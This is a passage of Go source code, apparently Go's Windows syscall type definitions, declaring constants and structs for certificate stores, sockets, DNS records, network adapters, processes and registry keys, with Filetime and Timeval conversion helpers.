CERT_STORE_PROV_SMART_CARD_W 305 | CERT_STORE_PROV_LDAP_W = 16 306 | CERT_STORE_PROV_LDAP = CERT_STORE_PROV_LDAP_W 307 | CERT_STORE_PROV_PKCS12 = 17 308 | 309 | /* store characteristics (low WORD of flag) for CertOpenStore function */ 310 | CERT_STORE_NO_CRYPT_RELEASE_FLAG = 0x00000001 311 | CERT_STORE_SET_LOCALIZED_NAME_FLAG = 0x00000002 312 | CERT_STORE_DEFER_CLOSE_UNTIL_LAST_FREE_FLAG = 0x00000004 313 | CERT_STORE_DELETE_FLAG = 0x00000010 314 | CERT_STORE_UNSAFE_PHYSICAL_FLAG = 0x00000020 315 | CERT_STORE_SHARE_STORE_FLAG = 0x00000040 316 | CERT_STORE_SHARE_CONTEXT_FLAG = 0x00000080 317 | CERT_STORE_MANIFOLD_FLAG = 0x00000100 318 | CERT_STORE_ENUM_ARCHIVED_FLAG = 0x00000200 319 | CERT_STORE_UPDATE_KEYID_FLAG = 0x00000400 320 | CERT_STORE_BACKUP_RESTORE_FLAG = 0x00000800 321 | CERT_STORE_MAXIMUM_ALLOWED_FLAG = 0x00001000 322 | CERT_STORE_CREATE_NEW_FLAG = 0x00002000 323 | CERT_STORE_OPEN_EXISTING_FLAG = 0x00004000 324 | CERT_STORE_READONLY_FLAG = 0x00008000 325 | 326 | /* store locations (high WORD of flag) for CertOpenStore function */ 327 | CERT_SYSTEM_STORE_CURRENT_USER = 0x00010000 328 | CERT_SYSTEM_STORE_LOCAL_MACHINE = 0x00020000 329 | CERT_SYSTEM_STORE_CURRENT_SERVICE = 0x00040000 330 | CERT_SYSTEM_STORE_SERVICES = 0x00050000 331 | CERT_SYSTEM_STORE_USERS = 0x00060000 332 | CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY = 0x00070000 333 | CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY = 0x00080000 334 | CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE = 0x00090000 335 | CERT_SYSTEM_STORE_UNPROTECTED_FLAG = 0x40000000 336 | CERT_SYSTEM_STORE_RELOCATE_FLAG = 0x80000000 337 | 338 | /* Miscellaneous high-WORD flags for CertOpenStore function */ 339 | CERT_REGISTRY_STORE_REMOTE_FLAG = 0x00010000 340 | CERT_REGISTRY_STORE_SERIALIZED_FLAG = 0x00020000 341 | CERT_REGISTRY_STORE_ROAMING_FLAG = 0x00040000 342 | CERT_REGISTRY_STORE_MY_IE_DIRTY_FLAG = 0x00080000 343 | CERT_REGISTRY_STORE_LM_GPT_FLAG = 0x01000000 344 | CERT_REGISTRY_STORE_CLIENT_GPT_FLAG = 0x80000000 345 | CERT_FILE_STORE_COMMIT_ENABLE_FLAG = 0x00010000 346 | CERT_LDAP_STORE_SIGN_FLAG = 0x00010000 347 | CERT_LDAP_STORE_AREC_EXCLUSIVE_FLAG = 0x00020000 348 | CERT_LDAP_STORE_OPENED_FLAG = 0x00040000 349 | CERT_LDAP_STORE_UNBIND_FLAG = 0x00080000 350 | 351 | /* addDisposition values for CertAddCertificateContextToStore function */ 352 | CERT_STORE_ADD_NEW = 1 353 | CERT_STORE_ADD_USE_EXISTING = 2 354 | CERT_STORE_ADD_REPLACE_EXISTING = 3 355 | CERT_STORE_ADD_ALWAYS = 4 356 | CERT_STORE_ADD_REPLACE_EXISTING_INHERIT_PROPERTIES = 5 357 | CERT_STORE_ADD_NEWER = 6 358 | CERT_STORE_ADD_NEWER_INHERIT_PROPERTIES = 7 359 | 360 | /* ErrorStatus values for CertTrustStatus struct */ 361 | CERT_TRUST_NO_ERROR = 0x00000000 362 | CERT_TRUST_IS_NOT_TIME_VALID = 0x00000001 363 | CERT_TRUST_IS_REVOKED = 0x00000004 364 | CERT_TRUST_IS_NOT_SIGNATURE_VALID = 0x00000008 365 | CERT_TRUST_IS_NOT_VALID_FOR_USAGE = 0x00000010 366 | CERT_TRUST_IS_UNTRUSTED_ROOT = 0x00000020 367 | CERT_TRUST_REVOCATION_STATUS_UNKNOWN = 0x00000040 368 | CERT_TRUST_IS_CYCLIC = 0x00000080 369 | CERT_TRUST_INVALID_EXTENSION = 0x00000100 370 | CERT_TRUST_INVALID_POLICY_CONSTRAINTS = 0x00000200 371 | CERT_TRUST_INVALID_BASIC_CONSTRAINTS = 0x00000400 372 | CERT_TRUST_INVALID_NAME_CONSTRAINTS = 0x00000800 373 | CERT_TRUST_HAS_NOT_SUPPORTED_NAME_CONSTRAINT = 0x00001000 374 | CERT_TRUST_HAS_NOT_DEFINED_NAME_CONSTRAINT = 0x00002000 375 | CERT_TRUST_HAS_NOT_PERMITTED_NAME_CONSTRAINT = 0x00004000 376 | CERT_TRUST_HAS_EXCLUDED_NAME_CONSTRAINT = 0x00008000 377 | CERT_TRUST_IS_PARTIAL_CHAIN = 0x00010000 378 | CERT_TRUST_CTL_IS_NOT_TIME_VALID = 0x00020000 379 | CERT_TRUST_CTL_IS_NOT_SIGNATURE_VALID = 0x00040000 380 | CERT_TRUST_CTL_IS_NOT_VALID_FOR_USAGE = 0x00080000 381 | CERT_TRUST_HAS_WEAK_SIGNATURE = 0x00100000 382 | CERT_TRUST_IS_OFFLINE_REVOCATION = 0x01000000 383 | CERT_TRUST_NO_ISSUANCE_CHAIN_POLICY = 0x02000000 384 | CERT_TRUST_IS_EXPLICIT_DISTRUST = 0x04000000 385 | CERT_TRUST_HAS_NOT_SUPPORTED_CRITICAL_EXT = 0x08000000 386 | 387 | /* InfoStatus values for CertTrustStatus struct */ 388 | CERT_TRUST_HAS_EXACT_MATCH_ISSUER = 0x00000001 389 | CERT_TRUST_HAS_KEY_MATCH_ISSUER = 0x00000002 390 | CERT_TRUST_HAS_NAME_MATCH_ISSUER = 0x00000004 391 | CERT_TRUST_IS_SELF_SIGNED = 0x00000008 392 | CERT_TRUST_HAS_PREFERRED_ISSUER = 0x00000100 393 | CERT_TRUST_HAS_ISSUANCE_CHAIN_POLICY = 0x00000400 394 | CERT_TRUST_HAS_VALID_NAME_CONSTRAINTS = 0x00000400 395 | CERT_TRUST_IS_PEER_TRUSTED = 0x00000800 396 | CERT_TRUST_HAS_CRL_VALIDITY_EXTENDED = 0x00001000 397 | CERT_TRUST_IS_FROM_EXCLUSIVE_TRUST_STORE = 0x00002000 398 | CERT_TRUST_IS_CA_TRUSTED = 0x00004000 399 | CERT_TRUST_IS_COMPLEX_CHAIN = 0x00010000 400 | 401 | /* policyOID values for CertVerifyCertificateChainPolicy function */ 402 | CERT_CHAIN_POLICY_BASE = 1 403 | CERT_CHAIN_POLICY_AUTHENTICODE = 2 404 | CERT_CHAIN_POLICY_AUTHENTICODE_TS = 3 405 | CERT_CHAIN_POLICY_SSL = 4 406 | CERT_CHAIN_POLICY_BASIC_CONSTRAINTS = 5 407 | CERT_CHAIN_POLICY_NT_AUTH = 6 408 | CERT_CHAIN_POLICY_MICROSOFT_ROOT = 7 409 | CERT_CHAIN_POLICY_EV = 8 410 | CERT_CHAIN_POLICY_SSL_F12 = 9 411 | 412 | /* AuthType values for SSLExtraCertChainPolicyPara struct */ 413 | AUTHTYPE_CLIENT = 1 414 | AUTHTYPE_SERVER = 2 415 | 416 | /* Checks values for SSLExtraCertChainPolicyPara struct */ 417 | SECURITY_FLAG_IGNORE_REVOCATION = 0x00000080 418 | SECURITY_FLAG_IGNORE_UNKNOWN_CA = 0x00000100 419 | SECURITY_FLAG_IGNORE_WRONG_USAGE = 0x00000200 420 | SECURITY_FLAG_IGNORE_CERT_CN_INVALID = 0x00001000 421 | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID = 0x00002000 422 | ) 423 | 424 | const ( 425 | // flags for SetErrorMode 426 | SEM_FAILCRITICALERRORS = 0x0001 427 | SEM_NOALIGNMENTFAULTEXCEPT = 0x0004 428 | SEM_NOGPFAULTERRORBOX = 0x0002 429 | SEM_NOOPENFILEERRORBOX = 0x8000 430 | ) 431 | 432 | const ( 433 | // Priority class. 434 | ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000 435 | BELOW_NORMAL_PRIORITY_CLASS = 0x00004000 436 | HIGH_PRIORITY_CLASS = 0x00000080 437 | IDLE_PRIORITY_CLASS = 0x00000040 438 | NORMAL_PRIORITY_CLASS = 0x00000020 439 | PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000 440 | PROCESS_MODE_BACKGROUND_END = 0x00200000 441 | REALTIME_PRIORITY_CLASS = 0x00000100 442 | ) 443 | 444 | var ( 445 | OID_PKIX_KP_SERVER_AUTH = []byte("1.3.6.1.5.5.7.3.1\x00") 446 | OID_SERVER_GATED_CRYPTO = []byte("1.3.6.1.4.1.311.10.3.3\x00") 447 | OID_SGC_NETSCAPE = []byte("2.16.840.1.113730.4.1\x00") 448 | ) 449 | 450 | // Pointer represents a pointer to an arbitrary Windows type. 451 | // 452 | // Pointer-typed fields may point to one of many different types. It's 453 | // up to the caller to provide a pointer to the appropriate type, cast 454 | // to Pointer. The caller must obey the unsafe.Pointer rules while 455 | // doing so. 456 | type Pointer *struct{} 457 | 458 | // Invented values to support what package os expects. 459 | type Timeval struct { 460 | Sec int32 461 | Usec int32 462 | } 463 | 464 | func (tv *Timeval) Nanoseconds() int64 { 465 | return (int64(tv.Sec)*1e6 + int64(tv.Usec)) * 1e3 466 | } 467 | 468 | func NsecToTimeval(nsec int64) (tv Timeval) { 469 | tv.Sec = int32(nsec / 1e9) 470 | tv.Usec = int32(nsec % 1e9 / 1e3) 471 | return 472 | } 473 | 474 | type Overlapped struct { 475 | Internal uintptr 476 | InternalHigh uintptr 477 | Offset uint32 478 | OffsetHigh uint32 479 | HEvent Handle 480 | } 481 | 482 | type FileNotifyInformation struct { 483 | NextEntryOffset uint32 484 | Action uint32 485 | FileNameLength uint32 486 | FileName uint16 487 | } 488 | 489 | type Filetime struct { 490 | LowDateTime uint32 491 | HighDateTime uint32 492 | } 493 | 494 | // Nanoseconds returns Filetime ft in nanoseconds 495 | // since Epoch (00:00:00 UTC, January 1, 1970). 496 | func (ft *Filetime) Nanoseconds() int64 { 497 | // 100-nanosecond intervals since January 1, 1601 498 | nsec := int64(ft.HighDateTime)<<32 + int64(ft.LowDateTime) 499 | // change starting time to the Epoch (00:00:00 UTC, January 1, 1970) 500 | nsec -= 116444736000000000 501 | // convert into nanoseconds 502 | nsec *= 100 503 | return nsec 504 | } 505 | 506 | func NsecToFiletime(nsec int64) (ft Filetime) { 507 | // convert into 100-nanosecond 508 | nsec /= 100 509 | // change starting time to January 1, 1601 510 | nsec += 116444736000000000 511 | // split into high / low 512 | ft.LowDateTime = uint32(nsec & 0xffffffff) 513 | ft.HighDateTime = uint32(nsec >> 32 & 0xffffffff) 514 | return ft 515 | } 516 | 517 | type Win32finddata struct { 518 | FileAttributes uint32 519 | CreationTime Filetime 520 | LastAccessTime Filetime 521 | LastWriteTime Filetime 522 | FileSizeHigh uint32 523 | FileSizeLow uint32 524 | Reserved0 uint32 525 | Reserved1 uint32 526 | FileName [MAX_PATH - 1]uint16 527 | AlternateFileName [13]uint16 528 | } 529 | 530 | // This is the actual system call structure. 531 | // Win32finddata is what we committed to in Go 1. 532 | type win32finddata1 struct { 533 | FileAttributes uint32 534 | CreationTime Filetime 535 | LastAccessTime Filetime 536 | LastWriteTime Filetime 537 | FileSizeHigh uint32 538 | FileSizeLow uint32 539 | Reserved0 uint32 540 | Reserved1 uint32 541 | FileName [MAX_PATH]uint16 542 | AlternateFileName [14]uint16 543 | } 544 | 545 | func copyFindData(dst *Win32finddata, src *win32finddata1) { 546 | dst.FileAttributes = src.FileAttributes 547 | dst.CreationTime = src.CreationTime 548 | dst.LastAccessTime = src.LastAccessTime 549 | dst.LastWriteTime = src.LastWriteTime 550 | dst.FileSizeHigh = src.FileSizeHigh 551 | dst.FileSizeLow = src.FileSizeLow 552 | dst.Reserved0 = src.Reserved0 553 | dst.Reserved1 = src.Reserved1 554 | 555 | // The src is 1 element bigger than dst, but it must be NUL. 556 | copy(dst.FileName[:], src.FileName[:]) 557 | copy(dst.AlternateFileName[:], src.AlternateFileName[:]) 558 | } 559 | 560 | type ByHandleFileInformation struct { 561 | FileAttributes uint32 562 | CreationTime Filetime 563 | LastAccessTime Filetime 564 | LastWriteTime Filetime 565 | VolumeSerialNumber uint32 566 | FileSizeHigh uint32 567 | FileSizeLow uint32 568 | NumberOfLinks uint32 569 | FileIndexHigh uint32 570 | FileIndexLow uint32 571 | } 572 | 573 | const ( 574 | GetFileExInfoStandard = 0 575 | GetFileExMaxInfoLevel = 1 576 | ) 577 | 578 | type Win32FileAttributeData struct { 579 | FileAttributes uint32 580 | CreationTime Filetime 581 | LastAccessTime Filetime 582 | LastWriteTime Filetime 583 | FileSizeHigh uint32 584 | FileSizeLow uint32 585 | } 586 | 587 | // ShowWindow constants 588 | const ( 589 | // winuser.h 590 | SW_HIDE = 0 591 | SW_NORMAL = 1 592 | SW_SHOWNORMAL = 1 593 | SW_SHOWMINIMIZED = 2 594 | SW_SHOWMAXIMIZED = 3 595 | SW_MAXIMIZE = 3 596 | SW_SHOWNOACTIVATE = 4 597 | SW_SHOW = 5 598 | SW_MINIMIZE = 6 599 | SW_SHOWMINNOACTIVE = 7 600 | SW_SHOWNA = 8 601 | SW_RESTORE = 9 602 | SW_SHOWDEFAULT = 10 603 | SW_FORCEMINIMIZE = 11 604 | ) 605 | 606 | type StartupInfo struct { 607 | Cb uint32 608 | _ *uint16 609 | Desktop *uint16 610 | Title *uint16 611 | X uint32 612 | Y uint32 613 | XSize uint32 614 | YSize uint32 615 | XCountChars uint32 616 | YCountChars uint32 617 | FillAttribute uint32 618 | Flags uint32 619 | ShowWindow uint16 620 | _ uint16 621 | _ *byte 622 | StdInput Handle 623 | StdOutput Handle 624 | StdErr Handle 625 | } 626 | 627 | type ProcessInformation struct { 628 | Process Handle 629 | Thread Handle 630 | ProcessId uint32 631 | ThreadId uint32 632 | } 633 | 634 | type ProcessEntry32 struct { 635 | Size uint32 636 | Usage uint32 637 | ProcessID uint32 638 | DefaultHeapID uintptr 639 | ModuleID uint32 640 | Threads uint32 641 | ParentProcessID uint32 642 | PriClassBase int32 643 | Flags uint32 644 | ExeFile [MAX_PATH]uint16 645 | } 646 | 647 | type ThreadEntry32 struct { 648 | Size uint32 649 | Usage uint32 650 | ThreadID uint32 651 | OwnerProcessID uint32 652 | BasePri int32 653 | DeltaPri int32 654 | Flags uint32 655 | } 656 | 657 | type Systemtime struct { 658 | Year uint16 659 | Month uint16 660 | DayOfWeek uint16 661 | Day uint16 662 | Hour uint16 663 | Minute uint16 664 | Second uint16 665 | Milliseconds uint16 666 | } 667 | 668 | type Timezoneinformation struct { 669 | Bias int32 670 | StandardName [32]uint16 671 | StandardDate Systemtime 672 | StandardBias int32 673 | DaylightName [32]uint16 674 | DaylightDate Systemtime 675 | DaylightBias int32 676 | } 677 | 678 | // Socket related. 679 | 680 | const ( 681 | AF_UNSPEC = 0 682 | AF_UNIX = 1 683 | AF_INET = 2 684 | AF_NETBIOS = 17 685 | AF_INET6 = 23 686 | AF_IRDA = 26 687 | AF_BTH = 32 688 | 689 | SOCK_STREAM = 1 690 | SOCK_DGRAM = 2 691 | SOCK_RAW = 3 692 | SOCK_RDM = 4 693 | SOCK_SEQPACKET = 5 694 | 695 | IPPROTO_IP = 0 696 | IPPROTO_ICMP = 1 697 | IPPROTO_IGMP = 2 698 | BTHPROTO_RFCOMM = 3 699 | IPPROTO_TCP = 6 700 | IPPROTO_UDP = 17 701 | IPPROTO_IPV6 = 41 702 | IPPROTO_ICMPV6 = 58 703 | IPPROTO_RM = 113 704 | 705 | SOL_SOCKET = 0xffff 706 | SO_REUSEADDR = 4 707 | SO_KEEPALIVE = 8 708 | SO_DONTROUTE = 16 709 | SO_BROADCAST = 32 710 | SO_LINGER = 128 711 | SO_RCVBUF = 0x1002 712 | SO_RCVTIMEO = 0x1006 713 | SO_SNDBUF = 0x1001 714 | SO_UPDATE_ACCEPT_CONTEXT = 0x700b 715 | SO_UPDATE_CONNECT_CONTEXT = 0x7010 716 | 717 | IOC_OUT = 0x40000000 718 | IOC_IN = 0x80000000 719 | IOC_VENDOR = 0x18000000 720 | IOC_INOUT = IOC_IN | IOC_OUT 721 | IOC_WS2 = 0x08000000 722 | SIO_GET_EXTENSION_FUNCTION_POINTER = IOC_INOUT | IOC_WS2 | 6 723 | SIO_KEEPALIVE_VALS = IOC_IN | IOC_VENDOR | 4 724 | SIO_UDP_CONNRESET = IOC_IN | IOC_VENDOR | 12 725 | 726 | // cf. http://support.microsoft.com/default.aspx?scid=kb;en-us;257460 727 | 728 | IP_TOS = 0x3 729 | IP_TTL = 0x4 730 | IP_MULTICAST_IF = 0x9 731 | IP_MULTICAST_TTL = 0xa 732 | IP_MULTICAST_LOOP = 0xb 733 | IP_ADD_MEMBERSHIP = 0xc 734 | IP_DROP_MEMBERSHIP = 0xd 735 | 736 | IPV6_V6ONLY = 0x1b 737 | IPV6_UNICAST_HOPS = 0x4 738 | IPV6_MULTICAST_IF = 0x9 739 | IPV6_MULTICAST_HOPS = 0xa 740 | IPV6_MULTICAST_LOOP = 0xb 741 | IPV6_JOIN_GROUP = 0xc 742 | IPV6_LEAVE_GROUP = 0xd 743 | 744 | MSG_OOB = 0x1 745 | MSG_PEEK = 0x2 746 | MSG_DONTROUTE = 0x4 747 | MSG_WAITALL = 0x8 748 | 749 | MSG_TRUNC = 0x0100 750 | MSG_CTRUNC = 0x0200 751 | MSG_BCAST = 0x0400 752 | MSG_MCAST = 0x0800 753 | 754 | SOMAXCONN = 0x7fffffff 755 | 756 | TCP_NODELAY = 1 757 | 758 | SHUT_RD = 0 759 | SHUT_WR = 1 760 | SHUT_RDWR = 2 761 | 762 | WSADESCRIPTION_LEN = 256 763 | WSASYS_STATUS_LEN = 128 764 | ) 765 | 766 | type WSABuf struct { 767 | Len uint32 768 | Buf *byte 769 | } 770 | 771 | type WSAMsg struct { 772 | Name *syscall.RawSockaddrAny 773 | Namelen int32 774 | Buffers *WSABuf 775 | BufferCount uint32 776 | Control WSABuf 777 | Flags uint32 778 | } 779 | 780 | // Invented values to support what package os expects. 781 | const ( 782 | S_IFMT = 0x1f000 783 | S_IFIFO = 0x1000 784 | S_IFCHR = 0x2000 785 | S_IFDIR = 0x4000 786 | S_IFBLK = 0x6000 787 | S_IFREG = 0x8000 788 | S_IFLNK = 0xa000 789 | S_IFSOCK = 0xc000 790 | S_ISUID = 0x800 791 | S_ISGID = 0x400 792 | S_ISVTX = 0x200 793 | S_IRUSR = 0x100 794 | S_IWRITE = 0x80 795 | S_IWUSR = 0x80 796 | S_IXUSR = 0x40 797 | ) 798 | 799 | const ( 800 | FILE_TYPE_CHAR = 0x0002 801 | FILE_TYPE_DISK = 0x0001 802 | FILE_TYPE_PIPE = 0x0003 803 | FILE_TYPE_REMOTE = 0x8000 804 | FILE_TYPE_UNKNOWN = 0x0000 805 | ) 806 | 807 | type Hostent struct { 808 | Name *byte 809 | Aliases **byte 810 | AddrType uint16 811 | Length uint16 812 | AddrList **byte 813 | } 814 | 815 | type Protoent struct { 816 | Name *byte 817 | Aliases **byte 818 | Proto uint16 819 | } 820 | 821 | const ( 822 | DNS_TYPE_A = 0x0001 823 | DNS_TYPE_NS = 0x0002 824 | DNS_TYPE_MD = 0x0003 825 | DNS_TYPE_MF = 0x0004 826 | DNS_TYPE_CNAME = 0x0005 827 | DNS_TYPE_SOA = 0x0006 828 | DNS_TYPE_MB = 0x0007 829 | DNS_TYPE_MG = 0x0008 830 | DNS_TYPE_MR = 0x0009 831 | DNS_TYPE_NULL = 0x000a 832 | DNS_TYPE_WKS = 0x000b 833 | DNS_TYPE_PTR = 0x000c 834 | DNS_TYPE_HINFO = 0x000d 835 | DNS_TYPE_MINFO = 0x000e 836 | DNS_TYPE_MX = 0x000f 837 | DNS_TYPE_TEXT = 0x0010 838 | DNS_TYPE_RP = 0x0011 839 | DNS_TYPE_AFSDB = 0x0012 840 | DNS_TYPE_X25 = 0x0013 841 | DNS_TYPE_ISDN = 0x0014 842 | DNS_TYPE_RT = 0x0015 843 | DNS_TYPE_NSAP = 0x0016 844 | DNS_TYPE_NSAPPTR = 0x0017 845 | DNS_TYPE_SIG = 0x0018 846 | DNS_TYPE_KEY = 0x0019 847 | DNS_TYPE_PX = 0x001a 848 | DNS_TYPE_GPOS = 0x001b 849 | DNS_TYPE_AAAA = 0x001c 850 | DNS_TYPE_LOC = 0x001d 851 | DNS_TYPE_NXT = 0x001e 852 | DNS_TYPE_EID = 0x001f 853 | DNS_TYPE_NIMLOC = 0x0020 854 | DNS_TYPE_SRV = 0x0021 855 | DNS_TYPE_ATMA = 0x0022 856 | DNS_TYPE_NAPTR = 0x0023 857 | DNS_TYPE_KX = 0x0024 858 | DNS_TYPE_CERT = 0x0025 859 | DNS_TYPE_A6 = 0x0026 860 | DNS_TYPE_DNAME = 0x0027 861 | DNS_TYPE_SINK = 0x0028 862 | DNS_TYPE_OPT = 0x0029 863 | DNS_TYPE_DS = 0x002B 864 | DNS_TYPE_RRSIG = 0x002E 865 | DNS_TYPE_NSEC = 0x002F 866 | DNS_TYPE_DNSKEY = 0x0030 867 | DNS_TYPE_DHCID = 0x0031 868 | DNS_TYPE_UINFO = 0x0064 869 | DNS_TYPE_UID = 0x0065 870 | DNS_TYPE_GID = 0x0066 871 | DNS_TYPE_UNSPEC = 0x0067 872 | DNS_TYPE_ADDRS = 0x00f8 873 | DNS_TYPE_TKEY = 0x00f9 874 | DNS_TYPE_TSIG = 0x00fa 875 | DNS_TYPE_IXFR = 0x00fb 876 | DNS_TYPE_AXFR = 0x00fc 877 | DNS_TYPE_MAILB = 0x00fd 878 | DNS_TYPE_MAILA = 0x00fe 879 | DNS_TYPE_ALL = 0x00ff 880 | DNS_TYPE_ANY = 0x00ff 881 | DNS_TYPE_WINS = 0xff01 882 | DNS_TYPE_WINSR = 0xff02 883 | DNS_TYPE_NBSTAT = 0xff01 884 | ) 885 | 886 | const ( 887 | // flags inside DNSRecord.Dw 888 | DnsSectionQuestion = 0x0000 889 | DnsSectionAnswer = 0x0001 890 | DnsSectionAuthority = 0x0002 891 | DnsSectionAdditional = 0x0003 892 | ) 893 | 894 | type DNSSRVData struct { 895 | Target *uint16 896 | Priority uint16 897 | Weight uint16 898 | Port uint16 899 | Pad uint16 900 | } 901 | 902 | type DNSPTRData struct { 903 | Host *uint16 904 | } 905 | 906 | type DNSMXData struct { 907 | NameExchange *uint16 908 | Preference uint16 909 | Pad uint16 910 | } 911 | 912 | type DNSTXTData struct { 913 | StringCount uint16 914 | StringArray [1]*uint16 915 | } 916 | 917 | type DNSRecord struct { 918 | Next *DNSRecord 919 | Name *uint16 920 | Type uint16 921 | Length uint16 922 | Dw uint32 923 | Ttl uint32 924 | Reserved uint32 925 | Data [40]byte 926 | } 927 | 928 | const ( 929 | TF_DISCONNECT = 1 930 | TF_REUSE_SOCKET = 2 931 | TF_WRITE_BEHIND = 4 932 | TF_USE_DEFAULT_WORKER = 0 933 | TF_USE_SYSTEM_THREAD = 16 934 | TF_USE_KERNEL_APC = 32 935 | ) 936 | 937 | type TransmitFileBuffers struct { 938 | Head uintptr 939 | HeadLength uint32 940 | Tail uintptr 941 | TailLength uint32 942 | } 943 | 944 | const ( 945 | IFF_UP = 1 946 | IFF_BROADCAST = 2 947 | IFF_LOOPBACK = 4 948 | IFF_POINTTOPOINT = 8 949 | IFF_MULTICAST = 16 950 | ) 951 | 952 | const SIO_GET_INTERFACE_LIST = 0x4004747F 953 | 954 | // TODO(mattn): SockaddrGen is union of sockaddr/sockaddr_in/sockaddr_in6_old. 955 | // will be fixed to change variable type as suitable. 956 | 957 | type SockaddrGen [24]byte 958 | 959 | type InterfaceInfo struct { 960 | Flags uint32 961 | Address SockaddrGen 962 | BroadcastAddress SockaddrGen 963 | Netmask SockaddrGen 964 | } 965 | 966 | type IpAddressString struct { 967 | String [16]byte 968 | } 969 | 970 | type IpMaskString IpAddressString 971 | 972 | type IpAddrString struct { 973 | Next *IpAddrString 974 | IpAddress IpAddressString 975 | IpMask IpMaskString 976 | Context uint32 977 | } 978 | 979 | const MAX_ADAPTER_NAME_LENGTH = 256 980 | const MAX_ADAPTER_DESCRIPTION_LENGTH = 128 981 | const MAX_ADAPTER_ADDRESS_LENGTH = 8 982 | 983 | type IpAdapterInfo struct { 984 | Next *IpAdapterInfo 985 | ComboIndex uint32 986 | AdapterName [MAX_ADAPTER_NAME_LENGTH + 4]byte 987 | Description [MAX_ADAPTER_DESCRIPTION_LENGTH + 4]byte 988 | AddressLength uint32 989 | Address [MAX_ADAPTER_ADDRESS_LENGTH]byte 990 | Index uint32 991 | Type uint32 992 | DhcpEnabled uint32 993 | CurrentIpAddress *IpAddrString 994 | IpAddressList IpAddrString 995 | GatewayList IpAddrString 996 | DhcpServer IpAddrString 997 | HaveWins bool 998 | PrimaryWinsServer IpAddrString 999 | SecondaryWinsServer IpAddrString 1000 | LeaseObtained int64 1001 | LeaseExpires int64 1002 | } 1003 | 1004 | const MAXLEN_PHYSADDR = 8 1005 | const MAX_INTERFACE_NAME_LEN = 256 1006 | const MAXLEN_IFDESCR = 256 1007 | 1008 | type MibIfRow struct { 1009 | Name [MAX_INTERFACE_NAME_LEN]uint16 1010 | Index uint32 1011 | Type uint32 1012 | Mtu uint32 1013 | Speed uint32 1014 | PhysAddrLen uint32 1015 | PhysAddr [MAXLEN_PHYSADDR]byte 1016 | AdminStatus uint32 1017 | OperStatus uint32 1018 | LastChange uint32 1019 | InOctets uint32 1020 | InUcastPkts uint32 1021 | InNUcastPkts uint32 1022 | InDiscards uint32 1023 | InErrors uint32 1024 | InUnknownProtos uint32 1025 | OutOctets uint32 1026 | OutUcastPkts uint32 1027 | OutNUcastPkts uint32 1028 | OutDiscards uint32 1029 | OutErrors uint32 1030 | OutQLen uint32 1031 | DescrLen uint32 1032 | Descr [MAXLEN_IFDESCR]byte 1033 | } 1034 | 1035 | type CertInfo struct { 1036 | // Not implemented 1037 | } 1038 | 1039 | type CertContext struct { 1040 | EncodingType uint32 1041 | EncodedCert *byte 1042 | Length uint32 1043 | CertInfo *CertInfo 1044 | Store Handle 1045 | } 1046 | 1047 | type CertChainContext struct { 1048 | Size uint32 1049 | TrustStatus CertTrustStatus 1050 | ChainCount uint32 1051 | Chains **CertSimpleChain 1052 | LowerQualityChainCount uint32 1053 | LowerQualityChains **CertChainContext 1054 | HasRevocationFreshnessTime uint32 1055 | RevocationFreshnessTime uint32 1056 | } 1057 | 1058 | type CertTrustListInfo struct { 1059 | // Not implemented 1060 | } 1061 | 1062 | type CertSimpleChain struct { 1063 | Size uint32 1064 | TrustStatus CertTrustStatus 1065 | NumElements uint32 1066 | Elements **CertChainElement 1067 | TrustListInfo *CertTrustListInfo 1068 | HasRevocationFreshnessTime uint32 1069 | RevocationFreshnessTime uint32 1070 | } 1071 | 1072 | type CertChainElement struct { 1073 | Size uint32 1074 | CertContext *CertContext 1075 | TrustStatus CertTrustStatus 1076 | RevocationInfo *CertRevocationInfo 1077 | IssuanceUsage *CertEnhKeyUsage 1078 | ApplicationUsage *CertEnhKeyUsage 1079 | ExtendedErrorInfo *uint16 1080 | } 1081 | 1082 | type CertRevocationCrlInfo struct { 1083 | // Not implemented 1084 | } 1085 | 1086 | type CertRevocationInfo struct { 1087 | Size uint32 1088 | RevocationResult uint32 1089 | RevocationOid *byte 1090 | OidSpecificInfo Pointer 1091 | HasFreshnessTime uint32 1092 | FreshnessTime uint32 1093 | CrlInfo *CertRevocationCrlInfo 1094 | } 1095 | 1096 | type CertTrustStatus struct { 1097 | ErrorStatus uint32 1098 | InfoStatus uint32 1099 | } 1100 | 1101 | type CertUsageMatch struct { 1102 | Type uint32 1103 | Usage CertEnhKeyUsage 1104 | } 1105 | 1106 | type CertEnhKeyUsage struct { 1107 | Length uint32 1108 | UsageIdentifiers **byte 1109 | } 1110 | 1111 | type CertChainPara struct { 1112 | Size uint32 1113 | RequestedUsage CertUsageMatch 1114 | RequstedIssuancePolicy CertUsageMatch 1115 | URLRetrievalTimeout uint32 1116 | CheckRevocationFreshnessTime uint32 1117 | RevocationFreshnessTime uint32 1118 | CacheResync *Filetime 1119 | } 1120 | 1121 | type CertChainPolicyPara struct { 1122 | Size uint32 1123 | Flags uint32 1124 | ExtraPolicyPara Pointer 1125 | } 1126 | 1127 | type SSLExtraCertChainPolicyPara struct { 1128 | Size uint32 1129 | AuthType uint32 1130 | Checks uint32 1131 | ServerName *uint16 1132 | } 1133 | 1134 | type CertChainPolicyStatus struct { 1135 | Size uint32 1136 | Error uint32 1137 | ChainIndex uint32 1138 | ElementIndex uint32 1139 | ExtraPolicyStatus Pointer 1140 | } 1141 | 1142 | const ( 1143 | // do not reorder 1144 | HKEY_CLASSES_ROOT = 0x80000000 + iota 1145 | HKEY_CURRENT_USER 1146 | HKEY_LOCAL_MACHINE 1147 | HKEY_USERS 1148 | HKEY_PERFORMANCE_DATA 1149 | HKEY_CURRENT_CONFIG 1150 | HKEY_DYN_DATA 1151 | 1152 | KEY_QUERY_VALUE = 1 1153 | KEY_SET_VALUE = 2 1154 | KEY_CREATE_SUB_KEY = 4 1155 | KEY_ENUMERATE_SUB_KEYS = 8 1156 | KEY_NOTIFY = 16 1157 | KEY_CREATE_LINK = 32 1158 | KEY_WRITE = 0x20006 1159 | KEY_EXECUTE = 0x20019 1160 | KEY_READ = 0x20019 1161 | KEY_WOW64_64KEY = 0x0100 1162 | KEY_WOW64_32KEY = 0x0200 1163 | KEY_ALL_ACCESS = 0xf003f 1164 | ) 1165 | 1166 | const ( 1167 | // do not reorder 1168 | REG_NONE = iota 1169 | REG_SZ 1170 | REG_EXPAND_SZ 1171 | 